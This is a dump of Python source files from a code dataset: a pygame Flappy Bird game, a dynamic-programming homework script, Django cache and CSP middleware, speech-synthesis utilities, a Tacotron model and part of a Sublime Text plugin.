self.counter += 
1\n\n\n\n\n def draw(self):\n self.BIRD.draw()\n for wall in self.WALLS:\n wall.draw()\n self.score_display()\n\n def create_new_wall(self):\n if self.score >= 10 and self.score < 20:\n h = random.randint(150,280)\n elif self.score >= 20:\n h = random.randint(140,260)\n else:\n h = random.randint(160,300)\n y = random.randint(50+h, self.SCREEN_HEIGHT - 50)\n\n self.v = 5\n self.WALLS.append(Wall(self,self.SCREEN_WIDTH,y,h,self.v))\n\n def score_display(self):\n\n font = pygame.font.Font(os.path.join('fonts','04B_19__.ttf'), 80)\n font2 = pygame.font.Font(os.path.join('fonts','04B_19__.ttf'), 95)\n scoretext = font.render( str(self.score), 1, (255, 255, 255))\n scoretext2 = font2.render( str(self.score), 1, (0, 0, 0))\n self.WINDOW.blit(scoretext2, (self.SCREEN_WIDTH // 2 - 24, 5 ))\n self.WINDOW.blit(scoretext,(self.SCREEN_WIDTH // 2 - 20 , 10))\n\n\n\nclass GameIntro(object):\n\n def __init__(self,game_name , screen_width , screen_height):\n\n self.game_name = game_name\n self.SCREEN_WIDTH, self.SCREEN_HEIGHT = screen_width, screen_height\n pygame.mixer.pre_init()\n pygame.init()\n self.WINDOW = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT))\n pygame.display.set_caption(game_name)\n\n self.BACKGROUND = pygame.image.load(os.path.join('images','bg2.png'))\n self.BACKGROUND_X = 0\n\n self.LOOP = True\n self.BUTTONS = [Button(self,490,200,300,100,(0,179, 140),(20,179, 100),'START',80 ),\n Button(self,490,320,300,100,(0,179,140),(20,179,100),'EXIT',100),\n Button(self,490,440,300,100,(0,179,140),(20,179,100),'MUSIC',80)]\n self.GAME_LOOP = True\n self.END_LOOP = True\n\n self.MUSIC = True\n\n self.LOGO = pygame.image.load(os.path.join('images', 'logo2.png'))\n\n while self.LOOP:\n pygame.time.delay(5)\n\n\n self.intro_tick()\n\n self.WINDOW.fill((0, 0, 0))\n self.WINDOW.blit(self.BACKGROUND, (self.BACKGROUND_X, 0))\n if self.BACKGROUND_X <= -1280 :\n self.BACKGROUND_X = 0\n\n self.BACKGROUND_X -= 2\n self.intro_draw()\n 
pygame.display.update()\n\n\n\n\n def intro_tick(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.LOOP = False\n self.GAME_LOOP = False\n self.END_LOOP = False\n elif event.type == pygame.MOUSEBUTTONUP:\n self.pos = pygame.mouse.get_pos()\n for button in self.BUTTONS:\n if (button.x <= self.pos[0] <= button.x + button.width) and (button.y <=self.pos[1]<= button.y + button.height):\n button.action()\n elif event.type == pygame.MOUSEMOTION:\n self.pos = pygame.mouse.get_pos()\n for button in self.BUTTONS:\n if (button.x <= self.pos[0] <= button.x + button.width) and (button.y <=self.pos[1]<= button.y + button.height):\n button.HOVER = True\n else:\n button.HOVER = False\n\n\n else:\n KEYS = pygame.key.get_pressed()\n if KEYS[pygame.K_SPACE] :\n self.LOOP = False\n\n\n\n def intro_draw(self):\n\n self.WINDOW.blit(self.LOGO,(0,-30))\n\n for button in self.BUTTONS:\n button.draw()\n\n\nclass EndScreen(object):\n def __init__(self,game_name , screen_width , screen_height,game,intro):\n\n self.game_name = game_name\n self.game = game\n self.intro = intro\n self.SCREEN_WIDTH, self.SCREEN_HEIGHT = screen_width, screen_height\n pygame.mixer.pre_init()\n pygame.init()\n\n self.MUSIC = intro.MUSIC\n\n self.WINDOW = pygame.display.set_mode((self.SCREEN_WIDTH, self.SCREEN_HEIGHT))\n pygame.display.set_caption(game_name)\n\n self.BACKGROUND = pygame.image.load(os.path.join('images','bg2.png'))\n self.BACKGROUND_X = self.game.BACKGROUND_X\n\n self.LOOP = self.intro.END_LOOP\n self.BUTTONS = [Button(self,490,600,300,100,(0,179,140),(20,179,100),'EXIT',100),Button(self,490,480,300,100,(0,179,140),(20,179,100),'TRY AGAIN',40)]\n\n\n self.TRY_AGAIN = False\n\n with open(os.path.join('highscores','highscores.txt'),'r+') as file:\n self.highscores = file.read().split(',')\n self.highscores = sorted([int(i) for i in self.highscores],key=lambda x:-x)\n\n\n while self.LOOP:\n pygame.time.delay(5)\n\n\n self.tick()\n\n self.WINDOW.fill((0, 0, 0))\n 
self.WINDOW.blit(self.BACKGROUND, (self.BACKGROUND_X, 0))\n if self.BACKGROUND_X <= -1280 :\n self.BACKGROUND_X = 0\n\n self.BACKGROUND_X -= 2\n self.draw()\n pygame.display.update()\n\n if self.game.SCORE > self.highscores[-1]:\n with open(os.path.join('highscores','highscores.txt'),'a+') as file:\n file.write(',' + str(self.game.SCORE))\n self.highscores.append(self.game.SCORE)\n self.highscores = sorted([int(i) for i in self.highscores], key=lambda x: -x)\n\n def tick(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.LOOP = False\n\n elif event.type == pygame.MOUSEBUTTONUP:\n self.pos = pygame.mouse.get_pos()\n for button in self.BUTTONS:\n if (button.x <= self.pos[0] <= button.x + button.width) and (button.y <=self.pos[1]<= button.y + button.height):\n button.action()\n elif event.type == pygame.MOUSEMOTION:\n self.pos = pygame.mouse.get_pos()\n for button in self.BUTTONS:\n if (button.x <= self.pos[0] <= button.x + button.width) and (button.y <=self.pos[1]<= button.y + button.height):\n button.HOVER = True\n else:\n button.HOVER = False\n else:\n KEYS = pygame.key.get_pressed()\n if KEYS[pygame.K_SPACE] :\n self.TRY_AGAIN = True\n self.LOOP = False\n pygame.mixer.Sound(os.path.join('music', '316798__grey24__flyffnotif.wav')).play()\n\n\n\n\n def draw(self):\n for button in self.BUTTONS:\n button.draw()\n self.score_display()\n\n def score_display(self):\n font = pygame.font.Font(os.path.join('fonts','04B_19__.ttf'), 60)\n font2 = pygame.font.Font(os.path.join('fonts','04B_19__.ttf'), 50)\n scoretext = font.render( 'YOUR RESULT: '+str(self.game.score), 1, (0, 0, 0))\n if self.game.SCORE > self.highscores[0]:\n self.WINDOW.blit(font2.render('new high score! 
' + str(self.game.SCORE) + ' !!!', 1, (0, 0, 0)), (self.SCREEN_WIDTH // 2 - 120, 150))\n else:\n self.WINDOW.blit(scoretext, (self.SCREEN_WIDTH // 2 - 200, 50 ))\n\n self.WINDOW.blit(font2.render( str(self.highscores[0]), 1, (255,215,0)), (self.SCREEN_WIDTH // 2 - 10, 190))\n self.WINDOW.blit(font2.render( str(self.highscores[1]), 1, (212,212,212)), (self.SCREEN_WIDTH // 2 - 60, 240))\n self.WINDOW.blit(font2.render( str(self.highscores[2]), 1, (204, 153, 0)), (self.SCREEN_WIDTH // 2 + 50, 240))\n\n\ndef run():\n i = GameIntro('FLAPPY BIRD', 1280, 720)\n\n if i.MUSIC:\n pygame.mixer.init()\n pygame.mixer.pre_init()\n pygame.init()\n pygame.mixer.music.load(os.path.join('music', 'flappybirdsong.mp3'))\n pygame.mixer.music.set_volume(0.5)\n pygame.mixer.music.play(-1)\n\n g = Game('FLAPPY BIRD',1280,720,i)\n e = EndScreen('FLAPPY BIRD - END',1280,720,g,i)\n while e.TRY_AGAIN:\n g = Game('FLAPPY BIRD', 1280, 720, i)\n e = EndScreen('FLAPPY BIRD - END', 1280, 720, g, i)\n pygame.quit()\n\nrun()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"70080652","text":"__author__ = 'Lorenzo'\n\n\ndef main():\n array = [31, -41, 59, 26, -53, 58, 97, -93, -23, 84]\n print(sum_max_contig(array))\n\n\ndef sum_max_contig(array):\n # Initialize jump\n jump = 0\n\n # Initialize n x 1 DP table\n C = []\n\n # Begin recursion\n for i in range(len(array)):\n if i == 0: # Base case\n C.append(array[i])\n elif array[i] < 0:\n C.append(C[i - 1])\n jump += 1\n elif array[i] >= 0:\n C.append(max(\n array[i],\n C[i - 1 - jump] + sum_skipped(array, i, jump) + array[i],\n C[i-1]\n ))\n jump = 0\n\n return C[len(array) - 1]\n\n\ndef sum_skipped(array, index, jump):\n sum = 0\n for j in range(index - jump, index):\n sum += array[j]\n return 
sum\n\nmain()","sub_path":"HW5/sum_max_contig_B.py","file_name":"sum_max_contig_B.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"364936548","text":"class DownstreamCacheControlMiddleware(object):\n def process_response(self, request, response):\n if 'CSRF_COOKIE_USED' in request.META:\n response['Edge-Control'] = 'no-store'\n return response\n\n\nclass CSPScriptHashMiddleware(object):\n def process_response(self, request, response):\n if hasattr(request, 'script_hashes'):\n for header in ('content-security-policy',\n 'content-security-policy-report-only'):\n if header in response._headers:\n csp_name, csp = response._headers[header]\n hashes = ' '.join(request.script_hashes)\n csp = csp.replace('script-src', 'script-src ' + hashes)\n\n response._headers[header] = (csp_name, csp)\n\n return response\n","sub_path":"cfgov/core/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"362060228","text":"import json\nimport os, sys\nfrom collections import defaultdict\n\nFALCON_DIR = os.environ.get('FALCONDIR')\nsys.path.append(FALCON_DIR)\nimport librosa\nfrom sklearn.manifold import TSNE\nfrom hyperparameters import hparams\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\nfrom scipy import signal\nfrom scipy.io import wavfile\nimport matplotlib.pyplot as plt\nimport torch.nn.functional as F\nfrom torch import nn\n\n\ndef populate_phonesarray(fname, feats_dir, feats_dict):\n if feats_dict is None:\n print(\"Expected a feature dictionary\")\n sys.exit()\n\n feats_array = []\n f = open(fname)\n for line in f:\n line = line.split('\\n')[0].split()\n feats = [feats_dict[phone] for phone in line]\n feats = np.array(feats)\n return feats\n\n\ndef learning_rate_decay(init_lr, global_step):\n warmup_steps = 4000.0\n step = 
global_step + 1.\n lr = init_lr * warmup_steps ** 0.5 * np.minimum(\n step * warmup_steps ** -1.5, step ** -0.5)\n return lr\n\n\ndef get_fnames(fnames_file):\n filenames_array = []\n f = open(fnames_file)\n for line in f:\n line = line.split('\\n')[0]\n filenames_array.append(line)\n return filenames_array\n\n\ndef get_featmetainfo(desc_file, feat_name):\n f = open(desc_file)\n for line in f:\n line = line.split('\\n')[0]\n feat = line.split('|')[0]\n if feat_name == feat:\n feat_length, feat_type = line.split('|')[1], line.split('|')[2]\n return feat_length, feat_type\n\n\nclass FloatDataSource(Dataset):\n \"\"\"\n Syntax\n dataset = FloatDataSource(fnames.txt.train, etc/falcon_feats.desc, feat_name, feats_dir)\n \"\"\"\n\n def __init__(self, fnames_file, desc_file, feat_name, feats_dir, feats_dict=None):\n self.fnames_file = fnames_file\n self.feat_name = feat_name\n self.desc_file = desc_file\n self.filenames_array = get_fnames(self.fnames_file)\n self.feat_length, self.feat_type = get_featmetainfo(self.desc_file, feat_name)\n self.feats_dir = feats_dir\n self.feats_dict = defaultdict(lambda: len(self.feats_dict)) if feats_dict is None else feats_dict\n\n def __getitem__(self, idx):\n\n fname = self.filenames_array[idx]\n if self.feat_name == 'f0':\n fname = self.feats_dir + '/' + fname.strip() + '.feats'\n feats_array = np.loadtxt(fname)\n\n else:\n fname = self.feats_dir + '/' + fname.strip() + '.feats.npy'\n feats_array = np.load(fname)\n return feats_array\n\n def __len__(self):\n return len(self.filenames_array)\n\n\nclass AudioSearchDataset(object):\n def __init__(self, Mel):\n self.Mel = Mel\n\n def __getitem__(self, idx):\n mel = self.Mel[idx]\n idx_random = np.random.randint(len(self.Mel))\n return mel, self.Mel[idx_random]\n\n def __len__(self):\n return len(self.Mel)\n\n\ndef collate_fn_audiosearch(batch):\n \"\"\"Create batch\"\"\"\n\n query_length = 200 # keeping fixed for now and assuming that audio length is atleast 100\n search_audio_lengths = 
[len(x[0]) for x in batch]\n max_audio_len = np.max(search_audio_lengths) + 1\n # is it good to pad and then extract query? if the difference between lengths is large, padding will be really bad,\n # also should we try edge padding instead of constant padding\n search = np.array([_pad_2d(x[0], max_audio_len) for x in batch], dtype=np.float)\n min_audio_len = np.min(search_audio_lengths)\n t = 4\n assert min_audio_len >= query_length\n search_batch = torch.FloatTensor(search)\n pos_queries = []\n for i in range(t):\n if min_audio_len == query_length:\n pos_query_start_idx = 0\n else:\n pos_query_start_idx = np.random.randint(min_audio_len - query_length)\n pos_query = search_batch[:, pos_query_start_idx: pos_query_start_idx + query_length]\n pos_queries.append(pos_query)\n\n t = 8\n query_length = np.random.randint(50, 200)\n neg_audio_lengths = [len(x[1]) for x in batch]\n max_neg_audio_len = np.max(neg_audio_lengths) + 1\n neg_query = np.array([_pad_2d(x[1], max_neg_audio_len) for x in batch], dtype=np.float)\n neg_query_batch = torch.FloatTensor(neg_query)\n min_neg_audio_len = np.min(neg_audio_lengths)\n # print(\"min_neg_audio_len\", min_neg_audio_len)\n assert min_neg_audio_len >= query_length\n neg_queries = []\n for i in range(t):\n if min_neg_audio_len == query_length:\n neg_query_start_idx = 0\n else:\n neg_query_start_idx = np.random.randint(min_neg_audio_len - query_length)\n neg_query = neg_query_batch[:, neg_query_start_idx: neg_query_start_idx + query_length]\n neg_queries.append(neg_query)\n return search_batch, pos_queries, neg_queries\n\n\ndef _pad(seq, max_len):\n # print(\"Shape of seq: \", seq.shape, \" and the max length: \", max_len)\n assert len(seq) < max_len\n # constant padding\n return np.pad(seq, (0, max_len - len(seq)),\n mode='constant', constant_values=0)\n\n\ndef _pad_2d(seq, max_len):\n # print(\"Shape of seq: \", seq.shape, \" and the max length: \", max_len)\n assert len(seq) < max_len\n # constant padding\n x = np.pad(seq, [(0, 
max_len - len(seq)), (0, 0)],\n mode=\"constant\", constant_values=0)\n return x\n\n\ndef data_parallel_workaround(model, input):\n device_ids = list(range(torch.cuda.device_count()))\n output_device = device_ids[0]\n replicas = torch.nn.parallel.replicate(model, device_ids)\n inputs = torch.nn.parallel.scatter(input, device_ids)\n replicas = replicas[:len(inputs)]\n outputs = torch.nn.parallel.parallel_apply(replicas, inputs)\n y_hat = torch.nn.parallel.gather(outputs, output_device)\n return y_hat, outputs, replicas\n\n\ndef save_wav(wav, path):\n wav *= 32767 / max(0.01, np.max(np.abs(wav)))\n wavfile.write(path, hparams.sample_rate, wav.astype(np.int16))\n\n\ndef plot_alignment(alignment, path, info=None):\n fig, ax = plt.subplots()\n im = ax.imshow(\n alignment,\n aspect='auto',\n origin='lower',\n interpolation='none')\n fig.colorbar(im, ax=ax)\n xlabel = 'Decoder timestep'\n if info is not None:\n xlabel += '\\n\\n' + info\n plt.xlabel(xlabel)\n plt.ylabel('Encoder timestep')\n plt.tight_layout()\n plt.savefig(path, format='png')\n\n\ndef save_alignment(path, attn, global_step):\n plot_alignment(attn.T, path, info=\"tacotron, step={}\".format(global_step))\n\n\ndef denormalize(S):\n return (np.clip(S, 0, 1) * -hparams.min_level_db) + hparams.min_level_db\n\n\ndef save_spectrogram(path, linear_output):\n spectrogram = denormalize(linear_output)\n plt.figure(figsize=(16, 10))\n plt.imshow(spectrogram.T, aspect=\"auto\", origin=\"lower\")\n plt.colorbar()\n plt.tight_layout()\n plt.savefig(path, format=\"png\")\n plt.close()\n\n\ndef _db_to_amp(x):\n return np.power(10.0, x * 0.05)\n\n\ndef inv_preemphasis(x):\n return signal.lfilter([1], [1, -hparams.preemphasis], x)\n\n\ndef _stft_parameters():\n n_fft = (hparams.num_freq - 1) * 2\n hop_length = int(hparams.frame_shift_ms / 1000 * hparams.sample_rate)\n win_length = int(hparams.frame_length_ms / 1000 * hparams.sample_rate)\n return n_fft, hop_length, win_length\n\n\ndef _istft(y):\n _, hop_length, win_length 
= _stft_parameters()\n return librosa.istft(y, hop_length=hop_length, win_length=win_length)\n\n\ndef _stft(y):\n n_fft, hop_length, win_length = _stft_parameters()\n return librosa.stft(y=y, n_fft=n_fft, hop_length=hop_length, win_length=win_length)\n\n\ndef _griffin_lim(S):\n \"\"\"\n librosa implementation of Griffin-Lim\n Based on https://github.com/librosa/librosa/issues/434\n \"\"\"\n angles = np.exp(2j * np.pi * np.random.rand(*S.shape))\n S_complex = np.abs(S).astype(np.complex)\n y = _istft(S_complex * angles)\n for i in range(hparams.griffin_lim_iters):\n angles = np.exp(1j * np.angle(_stft(y)))\n y = _istft(S_complex * angles)\n return y\n\n\ndef inv_spectrogram(spectrogram):\n \"\"\"Converts spectrogram to waveform using librosa\"\"\"\n S = _db_to_amp(denormalize(spectrogram) + hparams.ref_level_db) # Convert back to linear\n return inv_preemphasis(_griffin_lim(S ** hparams.power)) # Reconstruct phase\n\n\ndef save_states(global_step, mel_outputs, linear_outputs, attn, y,\n input_lengths, checkpoint_dir=None):\n step = str(global_step).zfill(7)\n print(\"Save intermediate states at step {}\".format(step))\n\n idx = 0\n\n # Alignment\n path = os.path.join(checkpoint_dir, \"step{}_alignment.png\".format(step))\n\n alignment = attn[idx].cpu().data.numpy()\n save_alignment(path, alignment, step)\n\n # Predicted spectrogram\n path = os.path.join(checkpoint_dir, \"step{}_predicted_spectrogram.png\".format(step))\n linear_output = linear_outputs[idx].cpu().data.numpy()\n save_spectrogram(path, linear_output)\n\n # Predicted audio signal\n signal = inv_spectrogram(linear_output.T)\n path = os.path.join(checkpoint_dir, \"step{}_predicted.wav\".format(step))\n save_wav(signal, path)\n\n # Target spectrogram\n path = os.path.join(checkpoint_dir, \"step{}_target_spectrogram.png\".format(step))\n linear_output = y[idx].cpu().data.numpy()\n save_spectrogram(path, linear_output)\n\n # Target audio signal\n signal = inv_spectrogram(linear_output.T)\n path = 
os.path.join(checkpoint_dir, \"step{}_target.wav\".format(step))\n save_wav(signal, path)\n\ndef save_checkpoint(model, optimizer, step, checkpoint_dir, epoch, spk_flag=None):\n step = str(step).zfill(7)\n checkpoint_path = os.path.join(\n checkpoint_dir, \"checkpoint_step{}.pth\".format(step))\n torch.save({\n \"state_dict\": model.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n \"global_step\": step,\n \"global_epoch\": epoch,\n }, checkpoint_path)\n print(\"Saved checkpoint:\", checkpoint_path)\n\n # Speaker Embedding\n if spk_flag:\n visualize_speaker_embeddings(model, checkpoint_dir, step)\n\n#### Visualization Stuff\n\ndef visualize_phone_embeddings(model, checkpoints_dir, step):\n print(\"Computing TSNE\")\n phone_embedding = model.embedding\n phone_embedding = list(phone_embedding.parameters())[0].cpu().detach().numpy()\n phone_embedded = TSNE(n_components=2, verbose=1, perplexity=40, n_iter=300).fit_transform(phone_embedding)\n\n with open(checkpoints_dir + '/ids_phones.json') as f:\n phones_dict = json.load(f)\n\n ids2phones = {v: k for (k, v) in phones_dict.items()}\n phones = list(phones_dict.keys())\n y = phone_embedding[:, 0]\n z = phone_embedding[:, 1]\n\n fig, ax = plt.subplots()\n ax.scatter(y, z)\n\n for i, phone in enumerate(phones):\n ax.annotate(phone, (y[i], z[i]))\n\n path = checkpoints_dir + '/step' + str(step) + '_embedding_phones.png'\n plt.tight_layout()\n plt.savefig(path, format=\"png\")\n plt.close()\n\n\ndef visualize_latent_embeddings(model, checkpoints_dir, step):\n return\n print(\"Computing TSNE\")\n latent_embedding = model.quantizer.embedding0.squeeze(0).detach().cpu().numpy()\n num_classes = model.num_classes\n\n ppl_array = [5, 10, 40, 100, 200]\n for ppl in ppl_array:\n\n embedding = TSNE(n_components=2, verbose=1, perplexity=ppl).fit_transform(latent_embedding)\n\n y = embedding[:, 0]\n z = embedding[:, 1]\n\n fig, ax = plt.subplots()\n ax.scatter(y, z)\n\n for i in range(num_classes):\n ax.annotate(i, (y[i], 
z[i]))\n\n path = checkpoints_dir + '/step' + str(step) + '_latent_embedding_perplexity_' + str(ppl) + '.png'\n plt.tight_layout()\n plt.savefig(path, format=\"png\")\n plt.close()\n\n\ndef return_classes(logits, dim=-1):\n _, predicted = torch.max(logits, dim)\n return predicted.view(-1).cpu().numpy()\n\n\nclass ContrastiveLoss(nn.Module):\n \"\"\"\n Contrastive loss\n Takes embeddings of two samples and computes loss\n \"\"\"\n\n def __init__(self, margin):\n super(ContrastiveLoss, self).__init__()\n self.margin = margin\n self.eps = 1e-9\n\n def forward(self, output1, output2, class_labels_1, class_labels_2):\n # distances = (output2 - output1).pow(2).sum(1) # squared distances\n # losses = 0.5 * (target.float() * distances +\n # (1 + -1 * target).float() * F.relu(self.margin - (distances + self.eps).sqrt()).pow(2))\n # return losses.mean()\n label_batch = (class_labels_1 != class_labels_1).cuda().float() # 0: similar pair, 1: different pair\n euclidean_distance = F.pairwise_distance(output1, output2)\n loss = torch.mean((1 - label_batch) * torch.pow(euclidean_distance, 2) +\n label_batch * torch.pow(torch.clamp(self.margin - euclidean_distance, min=0.0), 2))\n return loss","sub_path":"local/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":12764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"615674067","text":"#-*- coding: utf-8 -*-\nimport random,sys,os,torch\nfrom torch import nn\nimport models.Tacotron.hyperparams as hp\nfrom modules.Tacotron_modules import *\nfrom modules.Sequential_modules import BaseEncoder\n\nclass CHBGEncoder(nn.Module):\n \"\"\"\n Encoder\n \"\"\"\n def __init__(self, embed_size,hidden_size):\n \"\"\"\n\n :param embed_size: dimension of embedding\n \"\"\"\n super(CHBGEncoder, self).__init__()\n self.prenet = Prenet(hp.embed_size, hp.hidden_size * 2, hp.hidden_size)\n self.cbhg = CBHG(hp.hidden_size)\n\n def forward(self, input_):\n\n input_ = 
torch.transpose(input_,1,2)\n prenet = self.prenet.forward(input_)\n memory = self.cbhg.forward(prenet)\n return memory\n\nclass MelDecoder(nn.Module):\n \"\"\"\n Decoder\n \"\"\"\n def __init__(self,hidden_size,num_mels,outputs_per_step):\n super(MelDecoder, self).__init__()\n self.prenet = Prenet(num_mels,hidden_size * 2, hidden_size)\n self.attn_decoder = AttentionDecoder(hidden_size * 2,num_mels,outputs_per_step)\n\n def forward(self, decoder_input, memory,teacher_forcing_ratio):\n\n # Initialize hidden state of GRUcells\n attn_hidden, gru1_hidden, gru2_hidden = self.attn_decoder.inithidden(memory.size(0))\n outputs = list()\n att_score= list()\n stop_targets=list()\n # Training phase\n if self.training and decoder_input is not None:\n # Prenet\n dec_input = self.prenet.forward(decoder_input)\n timesteps = dec_input.size()[2] // hp.outputs_per_step\n\n # [GO] Frame\n prev_output = dec_input[:, :, 0]\n\n for i in range(timesteps):\n\n prev_output,stop, attn_hidden, gru1_hidden, gru2_hidden,attn_weights = self.attn_decoder.forward(prev_output, memory,\n attn_hidden=attn_hidden,\n gru1_hidden=gru1_hidden,\n gru2_hidden=gru2_hidden)\n\n outputs.append(prev_output)\n att_score.append(attn_weights)\n stop_targets.append(stop)\n if random.random() < teacher_forcing_ratio:\n # Get spectrum at rth position\n prev_output = dec_input[:, :, i * hp.outputs_per_step]\n else:\n # Get last output\n prev_output = self.prenet.forward(prev_output[:, :, -1].unsqueeze(2)).squeeze(2)\n\n # Concatenate all mel spectrogram\n\n else:\n # [GO] Frame\n #import pdb; pdb.set_trace()\n prev_output = torch.zeros((memory.size(0),1,hp.num_mels)).cuda()\n\n for i in range(hp.max_iters):\n prev_output = self.prenet.forward(prev_output)\n prev_output = prev_output[:,:,0]\n prev_output, stop,attn_hidden, gru1_hidden, gru2_hidden,attn_weights = self.attn_decoder.forward(prev_output, memory,\n attn_hidden=attn_hidden,\n gru1_hidden=gru1_hidden,\n gru2_hidden=gru2_hidden)\n\n 
outputs.append(prev_output)\n att_score.append(attn_weights)\n stop_targets.append(stop)\n if torch.max(stop).item()>0.5:\n break\n prev_output = prev_output[:, :, -1].unsqueeze(2)\n\n #import pdb; pdb.set_trace()\n outputs = torch.cat(outputs, 2)\n att_score= torch.cat(att_score, 2)\n stop_targets=torch.cat(stop_targets,2)\n return outputs,stop_targets,att_score\n\nclass PostProcessingNet(nn.Module):\n \"\"\"\n Post-processing Network\n \"\"\"\n def __init__(self,hidden_size,num_mels,num_freq):\n super(PostProcessingNet, self).__init__()\n self.postcbhg = CBHG(hidden_size,\n K=8,\n projection_size=num_mels,\n is_post=True)\n self.linear = SeqLinear(hidden_size * 2,\n num_freq)\n\n def forward(self, input_):\n out = self.postcbhg.forward(input_)\n out = self.linear.forward(torch.transpose(out,1,2))\n\n return out\n\nclass Tacotron(nn.Module):\n \"\"\"\n End-to-end Tacotron Network\n \"\"\"\n def __init__(self,vocab_size):\n super(Tacotron, self).__init__()\n self.embed = nn.Embedding(vocab_size,hp.embed_size)\n if hp.enc_type==\"CHBG\":\n self.encoder = CHBGEncoder(hp.embed_size,hp.hidden_size)\n elif hp.enc_type==\"BASIC\":\n self.encoder = BaseEncoder(hp.embed_size,hp.hidden_size*2,hp.enc_drop,hp.bidirectional,hp.enc_rnn)\n #self.encoder = EncoderRNN(hp.embed_size,hp.hidden_size,hp.n_layers,hp.dropout)\n #import pdb; pdb.set_trace()\n # TODO: Fix tacotron net setting\n self.decoder1 = MelDecoder(hp.hidden_size,hp.num_mels,hp.outputs_per_step)\n #self.decoder2 = PostProcessingNet(hp.hidden_size,hp.num_mels,hp.num_freq)\n\n def forward(self, txt, mel_input=None,teacher_forcing_ratio=1.):\n #import pdb; pdb.set_trace()\n if isinstance(txt,torch.cuda.FloatTensor):\n if txt.dim()>2:\n embed=txt.bmm(self.embed.weight.unsqueeze(0).repeat(txt.size(0),1,1))\n else:\n embed=txt.mm(self.embed.weight)\n else:\n embed=self.embed(txt)\n\n\n memory = self.encoder.forward(embed)\n mel_out,stop_targets,att_score = self.decoder1.forward(mel_input, memory,teacher_forcing_ratio)\n 
#linear_output = self.decoder2.forward(mel_out)\n\n return mel_out, stop_targets,att_score,#linear_output\n def encode(self,txt):\n txt=self.embed(txt)\n memory = self.encoder.forward(txt)\n return memory\n def decode(self,memory,mel_input,teacher_forcing_ratio):\n mel_out,stop_targets,att_score = self.decoder1.forward(mel_input, memory,teacher_forcing_ratio)\n return mel_out,stop_targets,att_score\n def get_path(self):\n return hp.enc_type+\"_\"+hp.att_type+\"/\"+\"emb\"+str(hp.embed_size)+\"_hid\"+str(hp.hidden_size)+\"_depth\"+str(hp.n_layers)+\"/\"\n\nclass Vocoder(nn.Module):\n \"\"\"\n End-to-end Tacotron Network\n \"\"\"\n def __init__(self):\n super(Vocoder, self).__init__()\n self.decoder2 = PostProcessingNet(hp.hidden_size,hp.num_mels,hp.num_freq)\n self.drop =nn.Dropout(0.3)\n def forward(self,mel_input):\n linear_output = self.decoder2.forward(self.drop(mel_input))\n return linear_output\n\n def get_path(self):\n return hp.voc_type\n","sub_path":"models/Tacotron/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":6951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"216592468","text":"#-*- coding: utf-8 -*-\n# stino/stcommands.py\n\nimport sublime\nimport sublime_plugin\nimport os\nimport stino\nimport time\n\nclass ShowFileExplorerPanelCommand(sublime_plugin.WindowCommand):\n\tdef run(self, top_path_list, condition_mod, condition_func, function_mod, function_func, \\\n\t\twith_files = True, with_button = False, extra_parameter = ''):\n\t\tself.level = 0\n\t\tself.top_path_list = top_path_list\n\t\tself.path_list = top_path_list\n\t\tself.condition_module = getattr(stino, condition_mod)\n\t\tself.condition_func = condition_func\n\t\tself.function_module = getattr(stino, function_mod)\n\t\tself.function_func = function_func\n\t\tself.with_files = with_files\n\t\tself.with_button = with_button\n\t\tself.extra_parameter = extra_parameter\n\n\t\tfile_list = 
stino.osfile.genFileListFromPathList(self.path_list, stino.cur_language)\n\t\tself.window.show_quick_panel(file_list, self.on_done)\n\n\tdef on_done(self, index):\n\t\tif index == -1:\n\t\t\treturn\n\n\t\tsel_path = self.path_list[index]\n\t\tif getattr(self.condition_module, self.condition_func)(sel_path):\n\t\t\tif self.extra_parameter:\n\t\t\t\tgetattr(self.function_module, self.function_func)(sel_path, self.extra_parameter)\n\t\t\telse:\n\t\t\t\tgetattr(self.function_module, self.function_func)(sel_path)\n\t\telse:\t\t\n\t\t\t(self.level, self.path_list) = stino.osfile.enterSubDir(self.top_path_list, \\\n\t\t\t\tself.level, index, sel_path, with_files = self.with_files, with_button = self.with_button)\n\t\t\tfile_list = stino.osfile.genFileListFromPathList(self.path_list, stino.cur_language)\n\t\t\tself.window.show_quick_panel(file_list, self.on_done)\n\nclass SelectItemCommand(sublime_plugin.WindowCommand):\n\tdef run(self, command, parent_mod, list_func, parameter1, parameter2, parameter3):\n\t\tparent_mod = getattr(stino, parent_mod) \n\t\tfunc = getattr(parent_mod, list_func)\n\t\tself.parameter1 = parameter1\n\t\tself.parameter2 = parameter2\n\t\tself.parameter3 = parameter3\n\t\tself.command = command\n\t\tif self.parameter1 and self.parameter3:\n\t\t\tself.info_list = func(self.parameter1, self.parameter2, self.parameter3)\n\t\telif self.parameter1:\n\t\t\tself.info_list = func(self.parameter1)\n\t\telse:\n\t\t\tself.info_list = func()\n\t\tif stino.utils.isLists(self.info_list):\n\t\t\tself.info_list = stino.utils.simplifyLists(self.info_list)\n\t\tself.window.show_quick_panel(self.info_list, self.on_done)\n\n\tdef on_done(self, index):\n\t\tif index == -1:\n\t\t\treturn\n\t\t\t\n\t\tsel_item = self.info_list[index]\n\t\tif self.parameter1 and self.parameter3:\n\t\t\tmenu_str = stino.utils.genKey(self.parameter2, self.parameter1)\n\t\t\tmenu_str = stino.utils.genKey(self.parameter3, menu_str)\n\t\t\tmenu_str = stino.utils.genKey(sel_item, 
